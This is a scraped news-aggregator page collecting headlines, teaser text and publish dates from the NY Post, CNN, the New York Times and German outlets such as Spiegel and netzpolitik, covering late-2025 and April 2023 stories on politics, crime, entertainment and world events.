Article link

Date of publish: Thu, 27 Nov 2025 17:39:12 -0500

Prince William and Kate Middleton celebrate Robert Irwin’s ‘DWTS’ win with sweet message

Irwin and his pro dance partner, Witney Carson, were named the Season 34 Len Goodman Mirrorball Trophy winners during Tuesday night's three-hour finale.

Article link

Date of publish: Thu, 27 Nov 2025 17:38:51 -0500

Prince William and Kate Middleton celebrate Robert Irwin’s ‘DWTS’ win with sweet message

Irwin and his pro dance partner, Witney Carson, were named the Season 34 Len Goodman Mirrorball Trophy winners during Tuesday night's three-hour finale.

Article link

Date of publish: Thu, 27 Nov 2025 17:38:51 -0500

Lefties melt down over moderate Dem Julie Menin likely becoming NYC Council speaker — whine she’ll ‘sabotage’ Zohran Mamdani

They’re not bendin’ for Menin. A collective of panicked lefty New Yorkers whined online that presumptive next City Council speaker Julie Menin will “sabotage” Mayor-elect Zohran Mamdani — as progressive lawmakers avoided congratulating the moderate Dem. The melodramatic X posts blasted Menin’s perceived lack of liberal ideological purity compared to the other top speaker contender...

Article link

Date of publish: Thu, 27 Nov 2025 17:31:50 -0500

Eminem makes surprise Thanksgiving halftime appearance with Jack White

The Real Slim Shady had everyone's attention during the Thanksgiving Day halftime show.

Article link

Date of publish: Thu, 27 Nov 2025 17:29:43 -0500

JPMorgan to build 3 million-square-foot, multibillion dollar tower in London’s Canary Wharf

The new London tower would also cover more space than JPMorgan's recently-completed 2.5 million-square-foot global headquarters on Park Avenue in Manhattan.

Article link

Date of publish: Thu, 27 Nov 2025 17:25:18 -0500

Thieves nab 20 phones at one NYC concert — as expert warns music fans are targets of global network

A coordinated phone theft operation hit a popular Brooklyn music venue this month after 20 concertgoers’ phones were reported stolen during a single show, The Post has learned, in what appears to be part of a growing network of international phone swipers targeting large-scale events.

Article link

Date of publish: Thu, 27 Nov 2025 17:20:54 -0500

Colts’ Daniel Jones playing through fractured fibula ahead of stretch run

Daniel Jones is reportedly playing through a fractured fibula as Indianapolis prepares for a matchup with Houston on Sunday.

Article link

Date of publish: Thu, 27 Nov 2025 17:15:40 -0500

Judging the ‘Sedition Six’: Letters to the Editor — Nov. 28, 2025

NY Post readers discuss the FBI probe of six Democrats who urged military members to refuse illegal orders.

Article link

Date of publish: Thu, 27 Nov 2025 17:14:45 -0500

Knicks have lineup plan as Mike Brown owns mistake he won’t repeat

Brown said he settled on this lineup after sifting through his mistakes, adjusting via trial and error.

Article link

Date of publish: Thu, 27 Nov 2025 17:00:52 -0500

Megan Fox and MGK reunite for cozy family outing with daughter Saga

The actress and the musician have reportedly reconciled after the birth of their daughter.

Article link

Date of publish: Thu, 27 Nov 2025 17:00:27 -0500

Megan Fox and MGK reunite for cozy family outing with daughter Saga

The actress and the musician have reportedly reconciled after the birth of their daughter.

Article link

Date of publish: Thu, 27 Nov 2025 17:00:27 -0500

bet365 bonus code NYPBET: Bet $5, get $150 in bonus bets for Bengals vs. Ravens

Use bet365 Sportsbook bonus code NYPBET to secure $150 in bonus betting value for Bengals vs. Ravens.

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 -0500

Is ‘9-1-1: Nashville’ On Tonight? Here’s When The Next New Episode Of ‘9-1-1: Nashville’ Airs On ABC And Hulu

We miss the 113 and Music City.

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 -0500

World’s Strongest Woman winner Jammie Booker talks sex life in resurfaced interview after title stripped over trans revelations

The controversial winner of the World’s Strongest Woman competition described the challenges of keeping multiple lovers happy in an interview that resurfaced after she was stripped of her title following the discovery that she was born a man. Jammie Booker, 28, was crowned champion at the 2025 World’s Strongest Woman event in Arlington, Texas, over...

Article link

Date of publish: Thu, 27 Nov 2025 16:50:43 -0500

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

Judge in Fox News-Dominion defamation trial: 'The parties have resolved their case'

The judge just announced in court that a settlement has been reached in the historic defamation case between Fox News and Dominion Voting Systems.

Article link

Date of publish: Wed, 19 Apr 2023 08:28:17 GMT

'Difficult to say with a straight face': Tapper reacts to Fox News' statement on settlement

A settlement has been reached in Dominion Voting Systems' defamation case against Fox News, the judge for the case announced. The network will pay more than $787 million to Dominion, a lawyer for the company said.

Article link

Date of publish: Tue, 18 Apr 2023 21:17:44 GMT

Millions in the US could face massive consequences unless McCarthy can navigate out of a debt trap he set for Biden

• DeSantis goes to Washington, a place he once despised, looking for support to take on Trump • Opinion: For the GOP to win, it must ditch Trump • Chris Christie mulling 2024 White House bid • Analysis: The fire next time has begun burning in Tennessee

Article link

Date of publish: Tue, 18 Apr 2023 20:34:45 GMT

White homeowner accused of shooting a Black teen who rang his doorbell turns himself in to face criminal charges

• 'A major part of Ralph died': Aunt of teen shot after ringing wrong doorbell speaks • 20-year-old woman shot after friend turned into the wrong driveway in upstate New York, officials say

Article link

Date of publish: Wed, 19 Apr 2023 04:29:05 GMT

Newly released video shows scene of Jeremy Renner's snowplow accident

Newly released body camera footage shows firefighters and sheriff's deputies rushing to help actor Jeremy Renner after a near-fatal snowplow accident in January. The "Avengers" actor broke more than 30 bones and suffered other severe injuries. CNN's Chloe Melas has more.

Article link

Date of publish: Tue, 18 Apr 2023 14:09:43 GMT

Jake Gyllenhaal and Jamie Lee Curtis spent the Covid-19 lockdown together

It's sourdough bread and handstands for Jake Gyllenhaal and Jamie Lee Curtis.

Article link

Date of publish: Tue, 18 Apr 2023 14:40:32 GMT

Toddler crawls through White House fence, prompts Secret Service response

A tiny intruder infiltrated White House grounds Tuesday, prompting a swift response from the US Secret Service.

Article link

Date of publish: Tue, 18 Apr 2023 17:38:16 GMT

Jamie Foxx remains hospitalized nearly a week after 'medical complication'

Jamie Foxx remains hospitalized in Georgia nearly a week after his daughter revealed the actor experienced a "medical complication," a source with knowledge of the matter told CNN on Monday.

Article link

Date of publish: Tue, 18 Apr 2023 00:27:07 GMT

A 13-year-old dies after participating in a Benadryl TikTok 'challenge'

A 13-year-old in Ohio has died after "he took a bunch of Benadryl," trying a dangerous TikTok challenge that's circulating online, according to a CNN affiliate and a GoFundMe account from his family.

Article link

Date of publish: Wed, 19 Apr 2023 15:01:06 GMT

See pizza delivery guy take out suspect fleeing police

Pizza guy delivers more than a pie, taking out a fleeing suspect. CNN's Jeanne Moos shows him putting his best foot forward.

Article link

Date of publish: Tue, 18 Apr 2023 16:40:22 GMT

Netflix is winding down its DVD business after 25 years

Netflix is officially winding down the business that helped make it a household name.

Article link

Date of publish: Tue, 18 Apr 2023 20:10:51 GMT

FTC chair Lina Khan warns AI could 'turbocharge' fraud and scams

Artificial intelligence tools such as ChatGPT could lead to a "turbocharging" of consumer harms including fraud and scams, and the US government has substantial authority to crack down on AI-driven consumer harms under existing law, members of the Federal Trade Commission said Tuesday.

Article link

Date of publish: Tue, 18 Apr 2023 17:59:38 GMT

Eating too much of these foods is driving the rise in type 2 diabetes, study says

Gobbling up too many refined wheat and rice products, along with eating too few whole grains, is fueling the growth of new cases of type 2 diabetes worldwide, according to a new study that models data through 2018.

Article link

Date of publish: Mon, 17 Apr 2023 16:02:46 GMT

ADHD medication abuse in schools is a 'wake-up call'

At some middle and high schools in the United States, 1 in 4 teens report they've abused prescription stimulants for attention deficit hyperactivity disorder during the year prior, a new study found.

Article link

Date of publish: Tue, 25 Apr 2023 17:44:36 GMT

Apple CEO was presented with an original Macintosh. See his reaction

CEO Tim Cook personally welcomed customers to the new Apple store in Mumbai as the tech company opens its first retail stores in India. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:17:25 GMT

Democrats bash Justice Clarence Thomas but their plan to investigate ethics allegations is unclear

Senate Democrats railed against Justice Clarence Thomas on Tuesday amid reports that the Supreme Court conservative failed to disclose luxury travel, gifts and a real estate transaction involving a GOP megadonor, but their plan to investigate the conservative jurist remains unclear.

Article link

Date of publish: Tue, 18 Apr 2023 20:29:46 GMT

Russia is 'going backwards' in equipment and deploying post WWII-era tanks, according to Western officials

• Jailed Wall Street Journal reporter Evan Gershkovich denied detention appeal in Moscow • Putin visits Russian troops at military headquarters in Kherson • Watch moment WSJ journalist appears in Russian court

Article link

Two Russians claiming to be former Wagner commanders admit killing children and civilians in Ukraine

Two Russian men who claim to be former Wagner Group commanders have told a human rights activist that they killed children and civilians during their time in Ukraine.

Article link

Date of publish: Tue, 18 Apr 2023 19:07:52 GMT

'My stomach is hurting from laughing': Hear panelist's reaction to DeSantis' threat to Disney

CNN panelists react to Florida Gov. Ron DeSantis floating the idea of building a competing theme park next to Disney World in Orlando.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:56 GMT

GOP prepared to block vote to replace Feinstein on Senate Judiciary

Senate Majority Leader Chuck Schumer said on Tuesday that he hopes to replace Democratic Sen. Dianne Feinstein on the Senate Judiciary Committee with Sen. Ben Cardin of Maryland and aims to set up a floor vote on the issue this afternoon, which Republicans are expected to block.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:13 GMT

Oklahoma governor calls on officials to resign over recording of racist and threatening remarks

Article link

Date of publish: Tue, 18 Apr 2023 17:33:17 GMT

McCarthy slams Biden in handling of US debt

House Speaker Kevin McCarthy traveled to Wall Street on Monday to deliver a fresh warning that the House GOP majority will refuse to lift a cap on government borrowing unless Biden agrees to spending cuts that would effectively neutralize his domestic agenda.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:01 GMT

US warns Russia not to touch American nuclear technology at Ukrainian nuclear plant

The US has sensitive nuclear technology at a nuclear power plant inside Ukraine and is warning Russia not to touch it, according to a letter the US Department of Energy sent to Russia's state-owned nuclear energy firm Rosatom last month.

Article link

Date of publish: Wed, 19 Apr 2023 08:35:33 GMT

Repeated gunshots fired on live TV as ex-lawmaker shot by assassins

Atiq Ahmed, a former lawmaker in India's parliament, convicted of kidnapping, was shot dead along with his brother while police were escorting them for a medical check-up in a slaying caught on live television on Saturday. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:41:42 GMT

FDA clears the way for additional bivalent boosters for certain vulnerable individuals

The U.S. Food and Drug Administration amended the terms of its emergency use authorizations for the Pfizer and Moderna bivalent vaccines on Tuesday, allowing people ages 65 and older and certain people with weakened immunity to get additional doses before this fall's vaccination campaigns.

Article link

Date of publish: Tue, 18 Apr 2023 15:09:15 GMT

Maine authorities detained a person of interest after 4 people were found dead in a home and 3 others shot while driving

Maine authorities have detained a person of interest and continue to investigate after two shooting incidents that appear to be connected left at least four people dead and three others injured, state police said.

Article link

Date of publish: Wed, 19 Apr 2023 01:49:51 GMT

Southwest says flights resumed after delays caused by 'tech issues'

• Delta Air Lines reports record bookings for summer travel • Air France and Airbus acquitted in trial over 2009 plane crash

Article link

Date of publish: Tue, 18 Apr 2023 17:15:29 GMT

Damar Hamlin cleared to resume football activities after January cardiac arrest

Buffalo Bills safety Damar Hamlin, who has been cleared to resume football activities, said Tuesday his cardiac arrest during an NFL game in January was caused by commotio cordis.

Article link

Date of publish: Tue, 18 Apr 2023 22:11:37 GMT

Pilot makes history after landing on top of a 56-story hotel

Polish pilot Lukasz Czepiela made history after landing a plane on a helipad at the top of a 56-story hotel in Dubai.

Article link

Date of publish: Sun, 19 Mar 2023 11:22:30 GMT

Top US Navy admiral defends non-binary sailor amid some Republican criticism

The top US Navy admiral ardently defended a non-binary sailor on Tuesday amid some criticism from Republican lawmakers, saying he is "particularly proud of this sailor."

Article link

Date of publish: Tue, 18 Apr 2023 19:56:40 GMT

Fulton County DA says fake Trump electors are incriminating one another and wants lawyer disqualified

The Fulton County District Attorney's office said some fake electors for Donald Trump have implicated each other in potential criminal activity and is seeking to disqualify their lawyer, according to a new court filing.

Article link

Date of publish: Wed, 19 Apr 2023 15:31:24 GMT

High speed trains are racing across the world. But not in America

High speed trains have proved their worth across the world over the past 50 years.

Article link

Date of publish: Wed, 19 Apr 2023 02:39:40 GMT

Podcast: One country musician is calling for other artists to oppose assault rifles
Here's what you need to know if you haven't filed your return yet — and even if you have

It's April 18, the official deadline to file your federal and state income tax returns for 2022. (It is also, apparently, National Animal Crackers Day for those who celebrate.)

Article link

Date of publish: Tue, 18 Apr 2023 14:15:43 GMT

Undocumented immigrants are paying their taxes today, too

It's a surprising fact that's often overlooked in the immigration debate.

Article link

Date of publish: Tue, 18 Apr 2023 18:29:24 GMT

Opinion: Why millionaires like us want to pay more in taxes

Tuesday is Tax Day in America, one of the most stressful days of the year, when many taxpayers will finally end their procrastination, file their federal returns, and hope for a refund from the IRS. But for many of the nation's wealthiest, it's just another Tuesday.

Article link

Date of publish: Mon, 17 Apr 2023 19:32:49 GMT

'World's longest' purpose-built cycling tunnel opens in Norway

There are many ways to explore the seven mountains that surround the picturesque UNESCO World Heritage city of Bergen on Norway's fjord-studded west coast. The newest, however, might well be record-breaking.

Article link

Date of publish: Tue, 18 Apr 2023 10:44:27 GMT

Artist rejects photo prize after AI-generated image wins award

A German artist has rejected an award from a prestigious international photography competition after revealing that his submission was generated by Artificial Intelligence (AI).

Article link

Date of publish: Tue, 18 Apr 2023 15:27:54 GMT

These ships disappeared in Lake Superior a century ago. Watch as they're found again

The Great Lakes Shipwreck Historical Society has found two of three ships that sank in the same Lake Superior storm more than a century ago, locating one in 2021 and the other in 2022.

Article link

Date of publish: Tue, 18 Apr 2023 19:29:01 GMT

Erotic images of seniors show sex and intimacy in new light

What does intimacy look like for seniors? There's no end to sex scenes and other steamy content featuring the young and unwrinkled, but past a certain age, popular culture largely draws a blank — or treats sex as a punchline.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:57 GMT

China's economy is off to a solid start, rising 4.5% in Q1 2023

China's economy is off to a solid start in 2023 following its emergence from three years of strict pandemic restrictions.

Article link

Date of publish: Tue, 18 Apr 2023 07:01:12 GMT

Even when wives make as much as husbands, they still do more at home

• Four out of the five US metro areas with the lowest unemployment are in Florida. Here's why • Opinion: The overlooked problem with raising the retirement age for Social Security

Article link

Date of publish: Sun, 16 Apr 2023 17:29:49 GMT

McDonald's is upgrading its burgers

McDonald's, which has been focusing on upgrading its core items to boost sales, is rolling out a series of changes designed to improve its signature burgers.

Article link

Date of publish: Mon, 17 Apr 2023 16:31:30 GMT

Google-parent stock drops on fears it could lose search market share to AI-powered rivals

Shares of Google-parent Alphabet fell more than 3% in early trading Monday after a report sparked concerns that its core search engine could lose market share to AI-powered rivals, including Microsoft's Bing.

Article link

Date of publish: Mon, 17 Apr 2023 15:52:19 GMT

Bidets save you money and reduce waste — we tested the best options out there
50+ products to make your life easier and our planet cleaner
Mother's Day is around the corner. Here are 50+ thoughtful gifts she'll love
A head-to-toe guide of how men should dress this spring, and where they should shop
42 of the most useful travel products you can buy on Amazon
The 7 best high-yield savings accounts of April 2023
Taxes are due tomorrow. Here's how to file for an extension
Composting is an easy way to reduce food waste. Here's how to do it
We stopped using aluminum foil for cooking and you should too. Here's what to use instead
The beloved Dyson Supersonic hair dryer is at its lowest price ever
Everything you need to know about Way Day 2023, Wayfair's biggest sale of the year
The 10 best Amazon deals to shop this week
Mifepristone saved my life

The ruling earlier this month by a Texas federal judge to suspend the US Food and Drug Administration's approval of a drug that is used frequently for medication abortions, is very personal for me.

Article link

Date of publish: Tue, 18 Apr 2023 11:30:00 GMT

The 2024 presidential alternative many voters will want
Why isn't the House Judiciary Committee looking into Thomas?

On Monday, the GOP-controlled House Judiciary Committee — chaired by Donald Trump ally Rep. Jim Jordan — is set to hold a field hearing in New York City called "Victims of Violent Crime in Manhattan." A statement bills the hearing as an examination of how, the Judiciary Committee says, Manhattan District Attorney Alvin Bragg's policies have "led to an increase in violent crime and a dangerous community for New York City residents."

Article link

Date of publish: Mon, 17 Apr 2023 11:37:37 GMT

Top secrets come spilling out

In 1917, British analysts deciphered a coded message the German foreign minister sent to one of his country's diplomats vowing to begin "unrestricted submarine warfare" and seeking to win over Mexico with a promise to "reconquer the lost territory in Texas, New Mexico and Arizona" if the US entered the world war. When it became public, the Zimmerman Telegram caused a sensation, helping propel the US into the conflict against Germany.

Article link

Date of publish: Sun, 16 Apr 2023 11:22:36 GMT

How did Sudan go from casting off despotic rule to this?

Four years ago, almost to the day, the people of Sudan were celebrating a revolution after overthrowing longtime dictator Omar al-Bashir. Now the East African country faces the possibility of a complete collapse similar to the chaos we see today in Yemen or Libya.

Article link

Date of publish: Mon, 17 Apr 2023 22:45:23 GMT

Michelle Yeoh set to return in new 'Star Trek' movie

Live long and prosper, Michelle Yeoh.

Article link

Date of publish: Tue, 18 Apr 2023 19:11:23 GMT

Recap: 'Succession' finds dark humor in the aftershocks

After the shock came the aftershocks, the power vacuum, and perhaps most significantly and impressively, the laughs, as "Succession" pivoted to face life after Logan Roy, in an episode that finally put the HBO show's title into full flower.

Article link

Date of publish: Mon, 17 Apr 2023 02:28:12 GMT

'Yellowjackets' leans hard into '90s music nostalgia, and we're here for it

Of the many dark gifts Showtime's eerie hit series "Yellowjackets" serves up for us, the juiciest this season is by far the music.

Article link

Date of publish: Mon, 01 May 2023 23:02:04 GMT

Jeremy Renner revisits 'the amazing group of people' who helped him recover from his accident

Jeremy Renner is continuing his recovery after his devastating snowplow accident in January, and recognizing those who've helped him along the way.

Article link

Date of publish: Sun, 16 Apr 2023 19:04:10 GMT

Review: 'Barry' takes a whack at its farewell season

"Barry" has taken chances from the very beginning, which is certainly true of a fourth and final season that picks up where the third left off, with its hitman-turned-wannabe actor getting arrested. That paves the way for an even darker season that accentuates the show's ensemble aspect while leaning a little too heavily on blurring lines with flights of fancy.

Article link

Date of publish: Fri, 14 Apr 2023 12:33:08 GMT

NYT > Top Stories

D.C. Shooting: What We Know About the National Guard Victims

The father of one of the West Virginia National Guard members who was shot said his daughter had a “mortal wound.” A man at the other member’s home asked for prayers for his son.

Article link

Date of publish: Thu, 27 Nov 2025 23:05:57 +0000

D.C. Shooting Suspect Worked With C.I.A.-Backed Unit in Afghanistan

The C.I.A. and an Afghan intelligence official said that the shooter had been part of an Afghan “partner force,” known as a Zero Unit, trained and supported by the agency in the southern province of Kandahar.

Article link

Date of publish: Thu, 27 Nov 2025 22:02:14 +0000

Hong Kong’s Worst Fire in Decades Fuels Scrutiny of Safety Lapses

The authorities said flammable netting and foam boards may have fueled the city’s deadliest blaze in nearly 70 years, killing more than 80 and prompting arrests.

Article link

Date of publish: Thu, 27 Nov 2025 21:47:57 +0000

‘No Alarm Went Off’: Hong Kong Fire Survivor Recounts Harrowing Escape

Many windows were covered, preventing residents from seeing the fire and smoke, one survivor said.

Article link

Date of publish: Thu, 27 Nov 2025 18:46:17 +0000

U.S. Has Limited Knowledge of Those It Kills in Boat Strikes

The U.S. military has killed more than 80 people since the campaign began in early September. But it does not know who specifically is being killed.

Article link

Date of publish: Thu, 27 Nov 2025 16:39:42 +0000

Why Is the U.S. Threatening Venezuela?

Venezuela doesn’t play a large role in the drug trade to the United States, so what is motivating the massive military buildup? Julian E. Barnes, who reports on intelligence and international security, discusses the issues with our senior writer Katrin Bennhold.

Article link

Date of publish: Thu, 27 Nov 2025 18:20:13 +0000

U.S. to Press Europe and Other Allies on Immigration, Document Says

American diplomats were told to raise U.S. concerns about “violent crimes associated with people of a migration background.”

Article link

Date of publish: Thu, 27 Nov 2025 02:30:54 +0000

Where the Waters Are Rough, a Fishing Town Confronts Trump’s Priorities

First, Newport, Ore., lost its Coast Guard rescue chopper. Then came the swirl of rumors and evidence that Immigration and Customs Enforcement was coming to town.

Article link

Date of publish: Thu, 27 Nov 2025 14:48:31 +0000

Gen X-ers Have Money to Spend. Why Are Retailers Ignoring Them?

Three in four Americans ages 45 to 60 say they expect to overspend for the holidays. They’re “sort of like the glue within the consumer spectrum.”

Article link

Date of publish: Thu, 27 Nov 2025 10:03:38 +0000

Black Friday Deals Can Put People in Debt. Here’s How to Manage It.

The convenience of one-click purchases and “buy now, pay later” loans is making it easier for people to shop — and shop and shop — during the holidays.

Article link

Date of publish: Thu, 27 Nov 2025 18:28:07 +0000

I’ve Written About Loads of Scams. This Phone Scam Almost Got Me.

The caller ID said “Chase Bank,” and the man on the line said I might be a victim of fraud. His supervisor would explain.

Article link

Date of publish: Sat, 20 Sep 2025 18:48:40 +0000

Did a Brooklyn Couple Kill a Neighbor’s Trees for a Better View in Maine?

Maine’s Board of Pesticides Control says two summer residents poisoned a neighbor’s trees so the couple, both Martha Stewart associates, could have a harbor view. They deny it.

Article link

Date of publish: Thu, 11 Sep 2025 15:45:16 +0000

11 Women, 9 Dogs, Not Much Drama (and No Guys)

These retired women in Texas have been through infertility, illness, layoffs, addiction and disappointing marriages. Now they are trying to create a utopia just for themselves.

Article link

Date of publish: Sun, 10 Aug 2025 21:12:51 +0000

Penn & Teller’s Secret to a 50-Year Partnership

As their magic act hits 50 years, they’re bigger than ever. They say their secret is not to socialize. But misdirection is also their love language.

Article link

Date of publish: Mon, 18 Aug 2025 13:56:55 +0000

My Parents Expected to Be Retired. Instead, They Are Raising My Sister’s Kids.

My mom and dad joined the millions of Americans who parent their children’s children — a beautiful responsibility that comes at a high cost.

Article link

Date of publish: Mon, 08 Sep 2025 16:10:48 +0000

A Professor’s Final Gift to Her Students: Her Life Savings

Cris Hassold, a professor at New College of Florida for 50 years, left a mark on her 31 favorite students. “I think about her almost every day,” one said.

Article link

Date of publish: Sun, 11 May 2025 09:00:10 +0000

Sean Duffy Longs for the ‘Golden Days’ of Air Travel. What Was That Like?

Back in the ’50s and ’60s, passengers (well-dressed, of course, and with perfect manners) could count on hot meals on china, plenty of legroom, the occasional piano bar, even wool blankets. Those days are gone.

Article link

Date of publish: Thu, 27 Nov 2025 10:03:44 +0000

Trump Cut Europe Out of Ukraine Talks. Here’s How Europe Pushed Back.

European leaders were blindsided by President Trump’s 28-point-plan to end the Ukraine war, setting off a dash for influence.

Article link

Date of publish: Thu, 27 Nov 2025 17:38:05 +0000

France Creates Voluntary Military Service as Europe Faces Russian Threat

The effort, aimed at young people, came after an army chief angered many by saying the country must accept the possible loss of “our children” in a future war.

Article link

Date of publish: Thu, 27 Nov 2025 17:41:35 +0000

Putin Defends Witkoff Against Accusations of Pro-Russia Bias

The Russian leader called the U.S. special envoy “an intelligent man” who is properly representing his country in peace negotiations.

Article link

Date of publish: Thu, 27 Nov 2025 16:54:57 +0000

Carney Lifts Climate Laws for New Alberta Pipeline

Prime Minister Mark Carney reached a tentative deal with the province as part of his program to curb the country’s economic dependence on the United States.

Article link

Date of publish: Thu, 27 Nov 2025 23:02:22 +0000

Gene Therapy Offer a Cure for Babies With the Deadly ‘Bubble Boy Disease’

“Bubble boy disease” was once a death sentence. A scientific breakthrough changed that.

Article link

Date of publish: Thu, 27 Nov 2025 10:00:53 +0000

‘Stranger Things’ Cast Looks Back on the Show and How It Shaped Them

The first episodes of the final season just premiered on Netflix. In interviews, the young stars looked back on the show and how it shaped them.

Article link

Date of publish: Thu, 27 Nov 2025 10:01:48 +0000

Labubu and KPop Demon Hunters Join Macy’s Thanksgiving Day Parade

Crowds in New York City bundled up to take in the latest version of a tradition that has run for nearly a century.

Article link

Date of publish: Thu, 27 Nov 2025 20:18:19 +0000

Eating What You Kill This Thanksgiving, With Hunter Steven Rinella

Michael Barbaro goes on a duck hunt with one of America’s most famous hunters: Steven Rinella.

Article link

Date of publish: Thu, 27 Nov 2025 13:53:51 +0000

Winter Storm in Northern U.S. Expected to Snarl Post-Thanksgiving Travel

Forecasters say a winter storm could disrupt travel, dumping up to a foot of snow across parts of the Midwest through the holiday weekend.

Article link

Date of publish: Thu, 27 Nov 2025 18:27:36 +0000

Robert A.M. Stern, Architect Who Reinvented Prewar Splendor, Dies at 86

He designed museums, schools and libraries before winning international acclaim late in life for 15 Central Park West in Manhattan, hailed as a rebirth of the luxury apartment building.

Article link

Date of publish: Thu, 27 Nov 2025 18:05:18 +0000

Robert A.M. Stern Is Still Dreaming of a Fresh New York

The sharp-tongued architect and professor built Manhattan’s most luxurious towers, but his new book shuttles from Billionaires’ Row to the Bronx. (Plus, what he thinks of Rem and Zaha.)

Article link

Date of publish: Mon, 10 Nov 2025 21:46:14 +0000

The Uniquely American Heartbreak of Yet Another Shooting

The National Guard members shot in Washington are the latest victims of a political violence permeating our society.

Article link

Date of publish: Thu, 27 Nov 2025 22:35:56 +0000

Time to Let My Brother Kevin Do the Carving

My brother takes a slice out of Trump and Mamdani.

Article link

Date of publish: Thu, 27 Nov 2025 10:02:26 +0000

Louvre Raising Ticket Prices for Non-European Visitors

From Jan. 14, visitors to the museum from outside the European Economic Area will pay 45 percent more for entry to help finance its ambitious renovation plan.

Article link

Date of publish: Thu, 27 Nov 2025 22:31:18 +0000

The British Public Thinks Immigration Is Up. It’s Actually Down, Sharply.

Net migration to Britain has fallen by almost 80 percent from its 2023 peak, according to data released on Thursday.

Article link

Date of publish: Thu, 27 Nov 2025 14:16:33 +0000

Pope Leo Lands in Turkey, Planning to Meet Erdogan With a Message of Outreach

President Recep Tayyip Erdogan received Leo XIV on the opening leg of a trip that will also include Lebanon.

Article link

Date of publish: Thu, 27 Nov 2025 17:33:00 +0000

What to Know About the Coup in Guinea-Bissau

The opposition has accused the president of putting a general in charge of the government so that he could stay in power and lead by proxy.

Article link

Date of publish: Thu, 27 Nov 2025 21:50:32 +0000

German News

News sites below.

DER SPIEGEL - Schlagzeilen – Tops

Ukrainekrieg: Putin knüpft Waffenruhe an ukrainischen Rückzug – Kyjiw lehnt Forderung strikt ab

Putin will den Rückzug der Ukraine aus den von Moskau beanspruchten Gebieten und droht mit militärischer Gewalt. Kyjiw weist die Forderungen entschieden zurück: Selenskyj werde kein Territorium »wegverhandeln«.

Article link

Date of publish: Thu, 27 Nov 2025 22:26:00 +0100

Stuttgart 21: Wer hat die nächste Verspätung verbockt?

Die Bahn schiebt die Eröffnung von Stuttgart 21 erneut in die Zukunft – und die Verantwortung auf den japanischen Konzern Hitachi. Doch so einfach ist es nicht.

Article link

Date of publish: Thu, 27 Nov 2025 19:30:00 +0100

Friedrich Merz verbittet sich Ermahnungen der USA zur Migrationspolitik

Deutschland entscheidet selbst über die Linie in der Migrationspolitik, stellt der Kanzler klar. Er reagiert damit auf eine Weisung der USA, westliche Regierungen zu härteren Maßnahmen zu drängen.

Article link

Date of publish: Thu, 27 Nov 2025 21:04:00 +0100

Nachrichten - WELT

Grüne Jugend kündigt Linksruck an und fordert mehr Mut von der Parteispitze

Die neue Führung der Grünen Jugend geht mit ihrer Parteispitze hart ins Gericht. Statt sich eine Tür zur Macht offenzuhalten, solle die Partei mehr Mut und Angriffslust beweisen, fordert der neue Co-Chef Luis Bobga.

Article link

Date of publish: Thu, 27 Nov 2025 23:00:52 GMT

Massenproteste zu AfD-Jugendkongress erwartet – Selbst die Bundeswehr warnt ihre Soldaten vor Gewalt

Angst vor Krawallen und juristisches Tauziehen - in Gießen wächst vor dem Gründungstreffen der AfD-Jugend und den erwarteten Gegenprotesten die Anspannung. Selbst die Bundeswehr warnt ihre Soldaten wegen Anti-AfD-Demos vor Angriffen.

Article link

Date of publish: Thu, 27 Nov 2025 22:26:28 GMT

USA prüfen Green Cards aller Ausländer aus „problematischen Ländern“

Ein Mann schießt nahe dem Weißen Haus auf zwei Nationalgardisten und verletzt diese lebensgefährlich. Das hat nun Konsequenzen für Inhaber der Green Card. Die Behörden wollen die Aufenthaltstitel aller Ausländer aus 19 Ländern überprüfen.

Article link

Date of publish: Thu, 27 Nov 2025 22:05:32 GMT

Nachrichten: DIE ZEIT Newsfeed

Krieg gegen die Ukraine: Wolodymyr Selenskyj kündigt Gespräche mit US-Delegation an

Vertreter der Ukraine und der USA wollen sich laut Selenskyj zeitnah zu Gesprächen treffen. Sie planen, den in Genf besprochenen Entwurf weiterzuentwickeln. Das Liveblog

Article link

Date of publish: Thu, 27 Nov 2025 23:17:44 -0000

Guinea-Bissau: Guinea-Bissaus Präsident nach mutmaßlichem Militärputsch ausgeflogen

Umaro Sissoco Embaló hat nach einem mutmaßlichen Putsch das Land verlassen. Die Staatengemeinschaft Ecowas und die Afrikanischen Union verurteilen die Machtübernahme.

Article link

Date of publish: Thu, 27 Nov 2025 23:10:08 -0000

Schüsse auf Nationalgardisten in Washington, D. C.: USA wollen afghanische Flüchtlinge aus Amtszeit von Joe Biden prüfen

Erst im April bekam der Tatverdächtige wohl Asyl, Donald Trump will dennoch Einreisen von Afghanen in der Vorgängerregierung prüfen. Auch Green Cards werden neu bewertet.

Article link

Date of publish: Thu, 27 Nov 2025 22:37:41 -0000

netzpolitik.org

Proteste gegen AfD-Jugend: Stadt Gießen will Demoverbotszone vor Gericht durchsetzen

Ortsschild mit Gießen und durchgestrichene AfD-Jugend
In Gießen wird es Massenproteste gegen die rechtsradikale AfD-Jugend geben. (Symbolbild) – Alle Rechte vorbehalten imago-giessen-afd-jugend-montage
Der Streit um eine von der Stadt Gießen verfügte Demoverbotszone geht nun in die nächste Instanz, vor den Hessischen Verwaltungsgerichtshof. Die Stadt beharrt darauf, die Proteste weit weg von der AfD-Veranstaltung zu verlegen.

Article link

Date of publish: Thu, 27 Nov 2025 18:51:28 +0000

Digitale Souveränität: Wie die EU Freie Software ausblendet

durch eine Fensterfront sind Emmanuel Macron und Friedrich Merz auf einem Podest bei einer Pressekonferenz zu sehen
Open Source musste beim Digitalgipfel in Berlin draußen bleiben. – Alle Rechte vorbehalten IMAGO/Chris Emil Janßen
